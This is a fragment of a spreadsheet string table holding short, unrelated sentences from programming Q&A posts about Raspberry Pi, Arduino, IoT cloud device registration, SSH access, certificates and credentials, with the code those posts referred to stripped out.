    <t>On the other hand, if I plug the usb device before starting default VM, I only got the message:
My questions are:
In fact, the usb device can not be detected in default VM started from Oracle VM VirtualBox, right?</t>
  </si>
  <si>
    <t>I tried to just disable Wifi and plug the Ethernet connection, but my app is not working anymore and can't reach Azure Cloud.</t>
  </si>
  <si>
    <t>IF you just don't want to trust a software layer, you could try manually setting the pin high:
The GPIO pins on the Raspberry Pi work with a voltage of 3.3VDC.</t>
  </si>
  <si>
    <t>UART is very vulnerable to EMI, to the point where you cannot reliably use UART buses outside a circuit board, without using differential signals (like RS-422).</t>
  </si>
  <si>
    <t>Since bluetooth detection times can be very fast (also in the range of 10s of milliseconds), if you are getting detection times of -100 ms, this may be within the limits of this setup.</t>
  </si>
  <si>
    <t>Looking at This manual
at page 6:
[] = default value, not required or may not appear 
And at page 28 the  command description reports:
Which means that gateway and netmask are optionals.</t>
  </si>
  <si>
    <t>Download the Arduino IDE
It also contains the AVR toolchain, and try to 'verify' (the left most button) the 'Blink' program 
If that verifies, recheck your install; it is likely you can make it work.</t>
  </si>
  <si>
    <t>Proposing a comprehensive, easy-to-use, high security replacement for usernames,
passwords, reminders, one-time-code authenticators .</t>
  </si>
  <si>
    <t>Instead of hardcoding credentials in apps, you can make calls to Secrets Manager to retrieve credentials whenever needed.</t>
  </si>
  <si>
    <t>The maximum file permissions (ie Read, Write, and Execute) that can be assigned to a directory or file on a Unix-based operating system (including Linux).</t>
  </si>
  <si>
    <t>Trying out some requests in the OAuth 2.0 Playground can help you understand how the protocol functions and make life easier when the time comes to use OAuth in your own code.</t>
  </si>
  <si>
    <t>Currently the Google Identity Platform is built of:
Google Sign-In for Android, iOS, and the Web
Smart Lock for Passwords on Android (see this tag)
Google Identity Toolkit for the Web, iOS, and Android</t>
  </si>
  <si>
    <t>For the dangerous level the permission must be requested at runtime, in contrast to normal permissions that are granted at install time.</t>
  </si>
  <si>
    <t>To determine if a URL is on any of the Safe Browsing lists, clients can use either the Lookup API (v4) or the Update API (v4).</t>
  </si>
  <si>
    <t>Or, use any other client-side validation library by writing a plug-in
to configure it using xVal's standard JSON rules description format.</t>
  </si>
  <si>
    <t>I have so far successfully created a system for registering, signing in, and signing out, but am having trouble with the final component.</t>
  </si>
  <si>
    <t>You can download it at https://software.intel.com/sites/landingpage/iotdk/board-boot-image.html
Find your board IP address and you'll be able to SSH into it.</t>
  </si>
  <si>
    <t>Some of their suggestions are:
allow a global user for VSFTPD full file system access 
This is a very dangerous option and breaks many security protocols VSFTPd is trying to help protect you from.</t>
  </si>
  <si>
    <t>Of course, you first need to register your device through the agent, and in this step, you define the different parameters that would be provided by your device (this will configure how you will have to send your json message).</t>
  </si>
  <si>
    <t>The right way to accomplish this is to write a device driver that properly coordinates with other kernel code to avoid concurrent access to the device.</t>
  </si>
  <si>
    <t>TokenAutoComplete is an Android Gmail style token auto-complete text field and filter.</t>
  </si>
  <si>
    <t>Therefore the File System API cannot be used to write to the local file system in any way intended for external/outside access to the sandboxed storage area.</t>
  </si>
  <si>
    <t>The exact error is as follows:
While I'm not 100% certain about the "not registered" part, I'm fairly certain this problem stems from my internet router.</t>
  </si>
  <si>
    <t>I added a "Privacy - Bluetooth Peripheral Usage Description" in the project's Info.plist without any luck.</t>
  </si>
  <si>
    <t>Once opened, it has to be made sure that the 'Serial interfacing' options are equal to the previously listed.</t>
  </si>
  <si>
    <t>It forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.</t>
  </si>
  <si>
    <t>Note: The placeholder attribute works with the following input types: text, search, url, tel, email, and password.</t>
  </si>
  <si>
    <t>Each change to the form
  state returns a new state, which maintains the integrity of the model
  between changes.</t>
  </si>
  <si>
    <t>The PHP project has moved to deprecate and ultimately remove MCrypt from the PHP core and other projects will likely follow suit.</t>
  </si>
  <si>
    <t>I would have expected that the OS should not return from the write to the direction file until it had set the permissions on the value file correctly.</t>
  </si>
  <si>
    <t>Went to http://192.168.240.1/ where I found the website / settings panel and added a password and connected to my own wifi network.</t>
  </si>
  <si>
    <t>They will be on a LAN with no WAN access... one is a Cisco Switch, one is the Pi and the other two are conversion boxes I want to log things on (they will be NTP client).</t>
  </si>
  <si>
    <t>losant forums - arduino hangs on authentication
This posts shows that you should try updating MQTT_MAX_PACKET_SIZE from 128 to 256 in PubSubClient.h.</t>
  </si>
  <si>
    <t>I was stuck for several days before I noticed the anti-virus on my PC block my python script call to the hardware level.</t>
  </si>
  <si>
    <t>BlockUI adds elements to the DOM to give it both the appearance and behavior of blocking user interaction.</t>
  </si>
  <si>
    <t>The source is then patched with the script file changes, and saved to a temp file.</t>
  </si>
  <si>
    <t>Input files read in are stored in memory fully decrypted.</t>
  </si>
  <si>
    <t>The first time I booted the Pi it worked OK, but I couldn't unlock the screen as I had no mouse attached.</t>
  </si>
  <si>
    <t>I see that I can install packages that contain the kernel debug symbols in Ubuntu as shown here.</t>
  </si>
  <si>
    <t>I've already dug through the permissions errors, but now I'm getting the following problem:
The method follows below.</t>
  </si>
  <si>
    <t>I am using the following code to flush a cache line on a raspberry pi 2:
I am getting an error that this is a privileged instruction when I run this.</t>
  </si>
  <si>
    <t>Finally after waiting a bit more the Pi0 has got itself an ipaddress and I can use the command
ssh pi@192.168.2.201
and I can successfully log on to my Pi0.</t>
  </si>
  <si>
    <t>To avoid corruption, the /boot and /root file systems are read-only.</t>
  </si>
  <si>
    <t>The internet would be a much more dangerous place if you could access any computer in any network as if it were a public server.</t>
  </si>
  <si>
    <t>Secure reverse routing
How to get the uploaded file with other inputs?</t>
  </si>
  <si>
    <t>SSPI is the means by which the operating system loads SSPs (Security Support Providers), such as Kerberos and NTLM, when the system boots.</t>
  </si>
  <si>
    <t>But when the second device completes to communicate, no new advertisement from it or the first device can be recognized again.</t>
  </si>
  <si>
    <t>Some details are at https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-mqtt-support
The other option is to compile the C SDK, which already has this certificate for TLS.</t>
  </si>
  <si>
    <t>Seems very easy but can't find how to modify config.yaml to add my credentials.</t>
  </si>
  <si>
    <t>My plan was to register device upon the installation or at the first boot up of the app.</t>
  </si>
  <si>
    <t>If a new central tries to connect, you could verify if its address is the same as your master.</t>
  </si>
  <si>
    <t>It is most often found on protected video content.</t>
  </si>
  <si>
    <t>I found this method to detect this, but AudioSessionGetProperty is deprecated in iOS7.</t>
  </si>
  <si>
    <t>So to help you guys help me, I should say my school's wifi is wpa2 encrypted.</t>
  </si>
  <si>
    <t>And end point is 
ssl://ec2-..compute.amazonaws.com:8883
Now I'm unable to connect to rabbitmq server using aws iot ios sdk.</t>
  </si>
  <si>
    <t>Also notice how the above code with
This is a quite WEIRD and SHADY statement and might not work.</t>
  </si>
  <si>
    <t>Polipo is a lightweight proxy server capable of forwarding and caching.</t>
  </si>
  <si>
    <t>That means you will often find WSE mentioned in conjunction with security.</t>
  </si>
  <si>
    <t>Could someone help me to find a way to auto login to jira and then display some jira page?</t>
  </si>
  <si>
    <t>I already found out about the Certificate stuff on Mono.</t>
  </si>
  <si>
    <t>1486888881: Error: Unable to load auth plugin "/etc/mosquitto/auth-plug.so".</t>
  </si>
  <si>
    <t>The code above first looks in the device keystore for a saved certificate and, if found, tries to connect using it.</t>
  </si>
  <si>
    <t>Arduino:
This is my .php code that would only show the rfid tag if found on database
getTag.php
And the result on serial monitor, it still shows access denied.</t>
  </si>
  <si>
    <t>The program will use a barcode scanner to verify weather a coupon is good or not and will flash either a red or green light depending on if the coupon is valid.</t>
  </si>
  <si>
    <t>Problem:
The Arduino bootloader is damaged, and this is the typical message:
avrdude: verification error, first mismatch at byte 0x0000
         0x62 != 0x0c
Solution:
I am trying to self-heal the Bootloader without having to use ICSP connections.</t>
  </si>
  <si>
    <t>How to handle the condition-
a. at the time of cloning the internet connection is lost
b. at the time of cloning the device suddenly switched off.</t>
  </si>
  <si>
    <t>I've worked on a collection of scripts that make this sort of thing more reliable but unfortunately I got tangled up in the hell that is cross-compiling Python modules and never got it into a releasable state.</t>
  </si>
  <si>
    <t>Then, connect your PC directly to the Arduino as usual, and use the terminal software to manually verify the Arduino software operation.</t>
  </si>
  <si>
    <t xml:space="preserve">
First of all be sure that the X forwarding is actived on your raspberry, you can check that in : X11Forwarding yes
ssh -X username@&lt;raspberry&gt; (-X flag for the X11 forwarding)
Run your script : (su) python /path/to/script.py
Sometimes when you try to run program via sudo you can have some error, you need to check the permissions of .Xauthority file</t>
  </si>
  <si>
    <t>As far as already written libraries:
https://github.com/QuickGroup/pyGT511C3
This one you will need to put in quite a bit of time to get the fingerprint scanner to work properly.</t>
  </si>
  <si>
    <t>The full process to calculate a SAS for the IoT Hub (in C#) is:
If you want to create the device in the IoTHub you have to have a policy with full permissions that mean:
Registry read and write, Service connect and Device connect.</t>
  </si>
  <si>
    <t>Using Application Default Credentials
You can also utilize Application Default credentials for your local testing and also works within App Engine environment.</t>
  </si>
  <si>
    <t>To address this situation, Android 5.0 (API level 21) allows enterprises to set up a special work user profile using the Managed Profile API.</t>
  </si>
  <si>
    <t>Connection points are the standard COM interface exposed by connectable objects, that allows clients to register for event callbacks.</t>
  </si>
  <si>
    <t>Android Authenticator refers to the class Authenticator in the mobile operating system Android that represents an object that knows how to obtain authentication for a network connection.</t>
  </si>
  <si>
    <t>Examples of types of credentials are passwords, one-time tokens, digital certificates, and phone numbers (calling/called).</t>
  </si>
  <si>
    <t>Often, once security is established to the point where the PHP user (in this case, the apache user) has very little risk attached to it, it is discovered that PHP is now prevented from writing any files to user directories.</t>
  </si>
  <si>
    <t>Navigation Drawer (android-navigation-drawer) can be an important focal point for identity and navigation within your app and consistency in the design here can make a considerable difference in how easy your app is to navigate, particularly for first time users.</t>
  </si>
  <si>
    <t>Control over port forwarding with SSH (local, remote or dynamic port forwarding), including built-in handling of X11 forwarding.</t>
  </si>
  <si>
    <t>android-lvl stands for android license verification library, a system introduced by Google for developers to check if an application has been bought through the Android market.</t>
  </si>
  <si>
    <t>I have the pi checking the account via POP, the only problem is it shuts down every time no matter what I type, I can't figure this one out.</t>
  </si>
  <si>
    <t>Note that delay is a blocking command which might not suit your purposes, in which case you could be looking at using the millis count to activate/deactivate the Serial.read.</t>
  </si>
  <si>
    <t>We have been unable to find this in my current workplace without having to write our own Javascript middlewares to handle the IdentityServer reference tokens.</t>
  </si>
  <si>
    <t>For the moment, I have been able to detect the devices, pair with them and create the Socket and the OutputStream, but for some reason the data doesn't show up.</t>
  </si>
  <si>
    <t>I have added X.509 self signed certificates for the following and got them verified by Azure using 'proof of possession' technique.</t>
  </si>
  <si>
    <t>I followed the Arduino Playground instructions, installing the client using  and adding my user ID to the groups uucp, lock and dialout.</t>
  </si>
  <si>
    <t>xcode project settings and project file issues, including code-signing, build configurations, etc</t>
  </si>
  <si>
    <t>So, simply modify the configuration to reflect your storage preferences and credentials!</t>
  </si>
  <si>
    <t>Since your interface to this functionality becomes your chatroom, you
can use the chat room as audit documentation of who requested what
task be completed.</t>
  </si>
  <si>
    <t>main.cpp:
email.c:
Error message on Raspberry Pi:
*** glibc detected *** ./Mailer: double free or corruption (!prev): 0x01d0da38 ***
P.S.</t>
  </si>
  <si>
    <t>While deleting thing i got this error =&gt;
The action failed because the input is not valid.</t>
  </si>
  <si>
    <t>Here is the Raw code for On and Off :
name bhutOn
name bhutOff
Raspberry pi is not able to decode the Raw code and showing following error as : 
pi@raspberrypi ~ $ sudo irrecord -a /home/pi/temp1.conf
Unknown encoding found.</t>
  </si>
  <si>
    <t>But when we re-connected the
  USB it would pop-up in the Windows Device Manager,
We might think we corrupted the bootloader of the Arduino Mega because we unplugged the USB cable during flashing.</t>
  </si>
  <si>
    <t>I created the enrolment group ok, then uploaded the root certificate and completed verification.</t>
  </si>
  <si>
    <t>I was looking around and found this article which interviews a Dr. Michael Kroll who claims that he found a way to transmit data from the Arduino to the iPhone without registering in the MFi Program.</t>
  </si>
  <si>
    <t>A list of verified cards can be found here: https://developer.microsoft.com/en-us/windows/iot/win10/SupportedInterfaces.htm#Storage</t>
  </si>
  <si>
    <t>I found that granting the permission manually resolved the access issue:
See this post on Github</t>
  </si>
  <si>
    <t>For example, the IOS BLE stack has constants to identify these well-known advertisement UUIDs, all available before connecting: CBAdvertisementDataLocalNameKey, CBAdvertisementDataManufacturerDataKey, CBAdvertisementDataServiceUUIDsKey, CBAdvertisementDataSolicitedServiceUUIDsKey.</t>
  </si>
  <si>
    <t>In my real code I need to compare calling number with the trusted list.</t>
  </si>
  <si>
    <t>ZAP provides automated scanners as well as a set of tools that allows to find security vulnerabilities manually.</t>
  </si>
  <si>
    <t>Note: The pattern attribute works with the following input types: text, search, url, tel, email, and password.</t>
  </si>
  <si>
    <t>But when I SSH in to my raspberry pi and run the script it gives me an error: 
So I found that you can use simplecv --headless to use simplecv without a monitor.</t>
  </si>
  <si>
    <t>You can also try implementing another iBeacon Raspberry Pi scanning script, written in Python, that can be found here.</t>
  </si>
  <si>
    <t>So checking if the connecting central device's address is the same as your previously bonded master is the last resort.</t>
  </si>
  <si>
    <t>You might want to add a new IBMIOT (Input) node and then create new credentials.</t>
  </si>
  <si>
    <t>By default, files saved to the internal storage are private to your application and other applications cannot access them (nor can the user).</t>
  </si>
  <si>
    <t>The board should run standalone (without login), so the application I developed should start upon each boot.</t>
  </si>
  <si>
    <t>I have found very little that I understand on this subject of remote data access.</t>
  </si>
  <si>
    <t>The codes works fine with an Arduino but getting error message when uploading to attiny45 chip.</t>
  </si>
  <si>
    <t>SoftwareSerial isn't supported on Intel Galileo boards - a workaround for Gen2 can be found here.</t>
  </si>
  <si>
    <t>With this option you can pass to the SDK the certificate that is used to validate the server's certificate.</t>
  </si>
  <si>
    <t>an opensource string tokenizing and parsing toolkit written in Objective-C. For use on Mac OS X and iOS.</t>
  </si>
  <si>
    <t>I have checked and verified everything suggested by Technaton as well.</t>
  </si>
  <si>
    <t>I tried using bluez but I can not detect the phone.</t>
  </si>
  <si>
    <t>I have done the exact same thing on a raspberry pi 3B and successfully associated to the network.</t>
  </si>
  <si>
    <t>I've already registered my device with register tool but its not helping out.</t>
  </si>
  <si>
    <t>You have to detach things, certificates and policies before deleting them.</t>
  </si>
  <si>
    <t>Did you verify the install before attempting to boot?</t>
  </si>
  <si>
    <t>Fiddling with the firewall I found out, that it is blocking.</t>
  </si>
  <si>
    <t>Please help me by verifying my device tree and suggesting me the right way to do it.</t>
  </si>
  <si>
    <t>I am unable to connect to AWS IoT endpoint, using STS credentials (AssumeRoleUsingWebIdentity) generated by AWS Lambda.</t>
  </si>
  <si>
    <t>I am using AWS Cognito for sign in and to get temporary credentials.</t>
  </si>
  <si>
    <t>It's seems hacky, but I wasn't able to find a better solution.</t>
  </si>
  <si>
    <t>You can find following github repo useful to understand how gateway can register child devices.</t>
  </si>
  <si>
    <t>I was experimenting this by configuring raspberry pi as the Access Point.</t>
  </si>
  <si>
    <t>Otherwise your token would be that last 0, or the newline following it.</t>
  </si>
  <si>
    <t xml:space="preserve">
Kismet is a wireless network detector, sniffer, and intrusion detection system.</t>
  </si>
  <si>
    <t>I have a school project about it security.</t>
  </si>
  <si>
    <t>I can hack my own driver to do this, during pca9570_probe(), but that feels very hacky.</t>
  </si>
  <si>
    <t>The module is unable to register with the network.</t>
  </si>
  <si>
    <t>Recently on Raspbian SSH is switch off.</t>
  </si>
  <si>
    <t>Use Wifi (which I really do not want to, Ethernet would be okay) to ssh into the Raspberry Pi (with an external library) and run scripts that way from the Android app.</t>
  </si>
  <si>
    <t>How to verify this?</t>
  </si>
  <si>
    <t>Authenticate password on chip.</t>
  </si>
  <si>
    <t>I think it is because I have not register the plugin ?</t>
  </si>
  <si>
    <t>How do I register this plugin ?</t>
  </si>
  <si>
    <t>Would you stick to fstab or rather use python to auto mount after detection over dbus?</t>
  </si>
  <si>
    <t>I have a raspberry pi, that I connect to via SSH.</t>
  </si>
  <si>
    <t>How on earth do I detect a bluetooth device?</t>
  </si>
  <si>
    <t>And my codes are written below.</t>
  </si>
  <si>
    <t>For detecting and decoding qr codes I want to use zbar.</t>
  </si>
  <si>
    <t>I would like to patch my ArchLinux for Raspberry Pi with grsecurity.</t>
  </si>
  <si>
    <t>what kind of codes should I write ?</t>
  </si>
  <si>
    <t>I am trying to get my webcam (connected to a Pi) to read qr codes.</t>
  </si>
  <si>
    <t>CODE:
ERRORS:
File name will be read from IR Sensor.</t>
  </si>
  <si>
    <t>If not reading from it will lock my ui.</t>
  </si>
  <si>
    <t>What if to use Intel Galileo board instead?</t>
  </si>
  <si>
    <t>When I try to verify, I get the error below.</t>
  </si>
  <si>
    <t>The same device is detected on my Ubuntu desktop and Mac Pro laptop.</t>
  </si>
  <si>
    <t>I am trying to debug code written for Raspberry Pi on my Ubuntu laptop.</t>
  </si>
  <si>
    <t>What is the reasoning for registering the Arduino device?</t>
  </si>
  <si>
    <t>Yes I have internet permission specified in my manifest.</t>
  </si>
  <si>
    <t>I tried IBM Bluemix and registered the device.</t>
  </si>
  <si>
    <t>If using the AWS-IOT sdk, how can I use aws credentials rather than the certificate authentication?</t>
  </si>
  <si>
    <t>I write this pseudocode as example:</t>
  </si>
  <si>
    <t>The mbeans were registered via this code: HystrixPlugins.getInstance().registerMetricsPublisher(HystrixServoMetricsPublisher.getInstance());</t>
  </si>
  <si>
    <t>Here is the codes that I wrote.</t>
  </si>
  <si>
    <t>I am using an MQTT client in JavaScript (paho-mqtt-js) to connect to an AWS IoT endpoint and I am able to connect if I use my own AWS credentials.</t>
  </si>
  <si>
    <t>How I can I verify this?</t>
  </si>
  <si>
    <t>But if there is more than one android device available I can't identify which device the raspberry has to connect.</t>
  </si>
  <si>
    <t>So I somehow need to store the password on the device to login every once in a while or after a reboot.</t>
  </si>
  <si>
    <t>Using NodeMCU to act as a wifi access point.</t>
  </si>
  <si>
    <t>Can someone verify this code for me?</t>
  </si>
  <si>
    <t>If I connect a USB cable and use the adb devices command, nothing is detected.</t>
  </si>
  <si>
    <t>Try to connect 
  manually.</t>
  </si>
  <si>
    <t>Should I Upgrade the WiFi shield ?</t>
  </si>
  <si>
    <t>I control the SSH commands with an Android App.</t>
  </si>
  <si>
    <t>Probably it is about Credential, but i tried so many things.</t>
  </si>
  <si>
    <t>The first network is coming from a device server as an access point.</t>
  </si>
  <si>
    <t>Any forge folks out there that can verify the code?</t>
  </si>
  <si>
    <t>I need to be able to shutdown/reboot the Raspberry Pi via the Android application through bluetooth.</t>
  </si>
  <si>
    <t>The various codes are given below.</t>
  </si>
  <si>
    <t>The daemon config looks like this:
That redirection  isn't working.</t>
  </si>
  <si>
    <t>I read somewhere that I can access the IoT devices through IAM/Cognito/using a certificate.</t>
  </si>
  <si>
    <t>Since I am an Android user I can't(I don't want to) use a device certificate.</t>
  </si>
  <si>
    <t>Can I use my IAM credentials to access my AWS IoT devices?</t>
  </si>
  <si>
    <t>Configuration over network is done by a Java aplication I wrote.</t>
  </si>
  <si>
    <t>It can't verify the certificate.</t>
  </si>
  <si>
    <t>ERROR: The certificate of bootstrap.pypa.io is not yet activated.</t>
  </si>
  <si>
    <t>Then I try to read ID register using RDID opcode.</t>
  </si>
  <si>
    <t>But i can't get the device being detect.</t>
  </si>
  <si>
    <t>I have registered in IBM watson and also registered my deivce there.</t>
  </si>
  <si>
    <t>Device is getting registered and trying to connect.</t>
  </si>
  <si>
    <t>Now I am at step 2 and I want to register my device but it doesn't seem to work.</t>
  </si>
  <si>
    <t>i can't get the Credentials for my CognitoIdentity.</t>
  </si>
  <si>
    <t>But for somehow, i can't get any credentials.</t>
  </si>
  <si>
    <t>Using those credentials I need to provide access of AWS IoT to that user.</t>
  </si>
  <si>
    <t>Where is the patched kernel?</t>
  </si>
  <si>
    <t>The only thing I get is the Pushtoken from the server.</t>
  </si>
  <si>
    <t>Then, of course, it came time to login to phpMyAdmin, but I did not have any password to use....</t>
  </si>
  <si>
    <t>Then I tried the same using aws cognito assessKeyId and secretKey, but this I time I got 403.</t>
  </si>
  <si>
    <t>How can I scan for networks successfully?</t>
  </si>
  <si>
    <t>In this link, the codes can be downloaded.</t>
  </si>
  <si>
    <t>Hello i am trying to connect my raspberry pi to ubuntu using ssh (ethernet cable).</t>
  </si>
  <si>
    <t>I can not seem to detect the Wii, or connect to it with the code I have so far.</t>
  </si>
  <si>
    <t>I would register it 'outside' of the device.</t>
  </si>
  <si>
    <t>My question is, does ethernet shield allowed with different networks use?</t>
  </si>
  <si>
    <t>Maybe I don't understand WiFiClientSecure?</t>
  </si>
  <si>
    <t>When I verify the certificate on the pi, I get an error.</t>
  </si>
  <si>
    <t>But it is not detectable on Google home app, even I had registered raspberry Pi in my google account.</t>
  </si>
  <si>
    <t>(I normally access my Raspberry Pi via SSH.)</t>
  </si>
  <si>
    <t>Or is it because the sensor is not not detected?</t>
  </si>
  <si>
    <t>code to register device -</t>
  </si>
  <si>
    <t>Nothing shows up, except my known devices.</t>
  </si>
  <si>
    <t>Ethernet should be done with W5500 chip connected over SPI.</t>
  </si>
  <si>
    <t>In the example, I am using the option SET_TRUSTED_CERT_IN_SAMPLES.</t>
  </si>
  <si>
    <t>But when the Django app is running, it doesn't work because there is no login user www-data, ie there is no file /home/www-data/.aws/credentials.</t>
  </si>
  <si>
    <t>You can ignore Cloud IoT configuration as I've verified it works (without CA certificate).</t>
  </si>
  <si>
    <t>Can anybody tell me the name of the file which validates the value of state?</t>
  </si>
  <si>
    <t>I am trying to login into the AWS iOT using the IAM user credentials.</t>
  </si>
  <si>
    <t>However, I can't register it with the appropriate command AT+SSLSETCERT=C:\ca.crt,ABC.</t>
  </si>
  <si>
    <t>I've seen codes from google but they are using 
which only works when it is detecting flame.</t>
  </si>
  <si>
    <t>The 'Azure IoT Hub Registry' node allows to register new IoT device.</t>
  </si>
  <si>
    <t>The root CA certificate has been registered on the AWS IoT core.</t>
  </si>
  <si>
    <t>My mic is working I verified with arecord.</t>
  </si>
  <si>
    <t>Request:
Response:
{
    "Message": "ErrorCode:DeviceAlreadyExists;A device with ID 'xyz' is already registered.</t>
  </si>
  <si>
    <t>1 esp8266 is used as access point and others are connected to it.</t>
  </si>
  <si>
    <t>I am working on fingerprint module r307 by Adafruit.</t>
  </si>
  <si>
    <t>This is my code to register the device to DPS.</t>
  </si>
  <si>
    <t>also is /etc folder possible to be encrypted too?</t>
  </si>
  <si>
    <t>You need to use pinMode(your_pin) to activate the IO pin.</t>
  </si>
  <si>
    <t>It means that your microcontroller is not detected.</t>
  </si>
  <si>
    <t>Your Android device will not be detected when it is connected to a Mega ADK board.</t>
  </si>
  <si>
    <t>Do some reading on Linux File Permissions and see where that takes you.</t>
  </si>
  <si>
    <t>You could see if it is a linux permission thing.</t>
  </si>
  <si>
    <t>You can see the firmware version by Reading the device using X-CTU.</t>
  </si>
  <si>
    <t>For example in this file:
https://github.com/bsalinas/ArduinoHue/blob/master/SerialHue/SerialHue.cpp#L20
there is a hardcoded username (the 22a82 thing).</t>
  </si>
  <si>
    <t>Weve not verified this either way.</t>
  </si>
  <si>
    <t>The data is most likely coming across as an HID-protocol USB device.</t>
  </si>
  <si>
    <t>You can use your Raspberry Pi to scan for iBeacons.</t>
  </si>
  <si>
    <t>If anyone could verify.</t>
  </si>
  <si>
    <t>The ssh connection is then avilable until you pclose(ssh); at some later point.</t>
  </si>
  <si>
    <t xml:space="preserve">
I'm writing a C++ program to control servo motor by Raspberry Pi with command above, and how can I access and run command to Raspberry Pi without ssh ?</t>
  </si>
  <si>
    <t>Once you've verified them both, they should work well together.</t>
  </si>
  <si>
    <t>Have you verified it?</t>
  </si>
  <si>
    <t>In that case GPIO controller is registered as an interrupt controller.</t>
  </si>
  <si>
    <t>Usually if you have more then 20-25 devices you need another access point.</t>
  </si>
  <si>
    <t>It is probably dangerous.</t>
  </si>
  <si>
    <t>You can do it like this: 
ssh -i ~/.ssh/blah.key -p 4444 userBackup@pibackup.fr it will load your key.</t>
  </si>
  <si>
    <t>If something is connected, unplug those.</t>
  </si>
  <si>
    <t>Just verify it</t>
  </si>
  <si>
    <t>You need an MFi chip on your Raspberry Pi to pass the iAP authentication.</t>
  </si>
  <si>
    <t>You write the passwordfunction in php because the user cannot see it.</t>
  </si>
  <si>
    <t>It's written in Electron and nodejs, and has ssh capabilities.</t>
  </si>
  <si>
    <t>with your credentials specified in your code.</t>
  </si>
  <si>
    <t>I wouldn't know for sure but it looks like your device doesn't have the NodeMCU firmware loaded.</t>
  </si>
  <si>
    <t>Need to give ip,username,password as command line argument(Remotelogin.exp)
`
Example: ./Remotelogin.exp</t>
  </si>
  <si>
    <t>Here are a few proxy options.</t>
  </si>
  <si>
    <t>You have several ways to activate ssh.</t>
  </si>
  <si>
    <t>What credentials do you use to connect the PI in NodeRed?</t>
  </si>
  <si>
    <t>I also use a raspberry pi 3 to connect to BLE devices and I don't need a patch.</t>
  </si>
  <si>
    <t xml:space="preserve">
If I connect a USB cable and use the adb devices command, nothing is detected.</t>
  </si>
  <si>
    <t>This tutorial shows how to register devices.</t>
  </si>
  <si>
    <t>He/she has to connect to ESP8266's AP and provide WiFi credentials somehow.</t>
  </si>
  <si>
    <t>But when I did them before register, agent app did not respond.</t>
  </si>
  <si>
    <t>To connect a device it must first be registered, so an id of d:orgId:randomNumber will not work.</t>
  </si>
  <si>
    <t>The user that runs the web server does not have the permission to read the file.</t>
  </si>
  <si>
    <t>Unlock the bootloader with 'fastboot flashing unlock' then try again</t>
  </si>
  <si>
    <t>Change your loginpart into below code:
This gives you oversight of used keys and values.</t>
  </si>
  <si>
    <t>As a side note, char *cmd = (char*)commandNames[i][1] is some dangerous code.</t>
  </si>
  <si>
    <t>How did you register your device?</t>
  </si>
  <si>
    <t>You need to understand there are 2 javascript APIs that you can use to access AWS IoT
The AWS IOT Device SDKs for javascript, using MQTT as a protocol and x509 certificates for authentication.</t>
  </si>
  <si>
    <t>What you're doing is dangerous.</t>
  </si>
  <si>
    <t>Even though Huawei/Vodafone K5160 modem is in the hardware compatibility list, it is not Microsoft Verified.</t>
  </si>
  <si>
    <t>Now the sample that you read is for an Unauthenticated user, which you don't want.</t>
  </si>
  <si>
    <t>You can keep the ngrok on all the time by using the authtoken.</t>
  </si>
  <si>
    <t>Aug 26 19:00:00 192.168.0.1 hostapd: wlan0: STA aa:aa:aa:aa:aa:aa WPA: group key handshake completed (RSN)</t>
  </si>
  <si>
    <t>But I never tried this, because I once was in possession of some authentication chips.</t>
  </si>
  <si>
    <t>Connect all the devices to the same network i.e Access point.</t>
  </si>
  <si>
    <t>That way I don't have to ssh into my pi and update my code manually.</t>
  </si>
  <si>
    <t>However, they're being registered backwards.</t>
  </si>
  <si>
    <t>You can use a BLE sniffer to verify this.</t>
  </si>
  <si>
    <t>Comli is a master/slave protocol that is used in some older devices or when it is not possible to use ethernet.</t>
  </si>
  <si>
    <t>For example, trying to access a file that doesn't allow read access by your user.</t>
  </si>
  <si>
    <t>AccountManager keeps track of cloud login information on Android devices.</t>
  </si>
  <si>
    <t>The module is registered as an application.</t>
  </si>
  <si>
    <t>An OAuth library written in PHP</t>
  </si>
  <si>
    <t>Deadbolt 2 is an authorization system for the Play framework, with both Scala and Java APIs.</t>
  </si>
  <si>
    <t>The library was previously named Kentor.AuthServices</t>
  </si>
  <si>
    <t>The library was previously named Kentor.AuthServices.</t>
  </si>
  <si>
    <t xml:space="preserve">
Permissions Guide
All available permissions</t>
  </si>
  <si>
    <t>Jump to definition of identifier at point.</t>
  </si>
  <si>
    <t>You can use the certificates outside of this API.</t>
  </si>
  <si>
    <t>cryptographic functions) on the chip.</t>
  </si>
  <si>
    <t>It supports a few authentication options out of the box, OAuth2 in particular with an example given for Facebook.</t>
  </si>
  <si>
    <t>* authorization right) and then
     writes the file to stdout.</t>
  </si>
  <si>
    <t>You can read more at Code Security.</t>
  </si>
  <si>
    <t>Intel Syntax is used in Intel's (and AMD's) manuals, and by many assemblers.</t>
  </si>
  <si>
    <t>Plays Well with Others
Shadowbox tries to be as unobtrusive as possible.</t>
  </si>
  <si>
    <t>Agda is a proof assistant.</t>
  </si>
  <si>
    <t>The Pythagorean trigonometric identity states that sin^2(x) + cos^2(x) == 1 for all x, and is a corollary of the Pythagorean theorem.</t>
  </si>
  <si>
    <t>I have verified that keypoint detection is working because I've run:
print keypoints
and I can see a varying number of keypoints printed to the command line as I point the camera around the room.</t>
  </si>
  <si>
    <t>When entering the repository url, I get (the commonly known) "Failed to connect to repository"
When using https and providing credentials (via Jenkins Credentials store), I get the error.</t>
  </si>
  <si>
    <t>So, check the time being returned by the Twitter server and make sure your local machine that is generating the signature matches the same time.</t>
  </si>
  <si>
    <t>Hazards
If your program shares a single GPIO port-register amongst several tasks, then you must ensure access to this register is thread-safe.</t>
  </si>
  <si>
    <t>Connect.inc.php has credential info and functions .php just routes the data to another table I believe.I'm not sure if all this is necessary to post the data but my friend wrote all the additional code and we've been busy trying to get the rest of the project to work so I haven't gotten a full understanding of how this works yet.</t>
  </si>
  <si>
    <t>Change "the created root certificate" to DigiCert Baltimore Root Certificate as the document points out:
In order to establish a TLS connection, you may need to download and
  reference the DigiCert Baltimore Root Certificate.</t>
  </si>
  <si>
    <t>If i understood your question you need add in your code ip server ex.192.168.1.4 
In my test i have used  this library #include WiFiClientSecure.h and wrote this code to receive response from my php file...(using esp8266)
//HTML
i hope that this is helpful
inother there is a link youtube that talk about arduino and mysql
https://www.youtube.com/watch?v=6hi9Wf99hfg</t>
  </si>
  <si>
    <t>The loaderLock managed debugging assistant detects attempts to execute managed code on a thread that holds the Microsoft Windows operating system loader lock.</t>
  </si>
  <si>
    <t>One of the problems with digital certificate management is that fraudulent certificates take a long time to be spotted, reported and revoked by the browser vendors.</t>
  </si>
  <si>
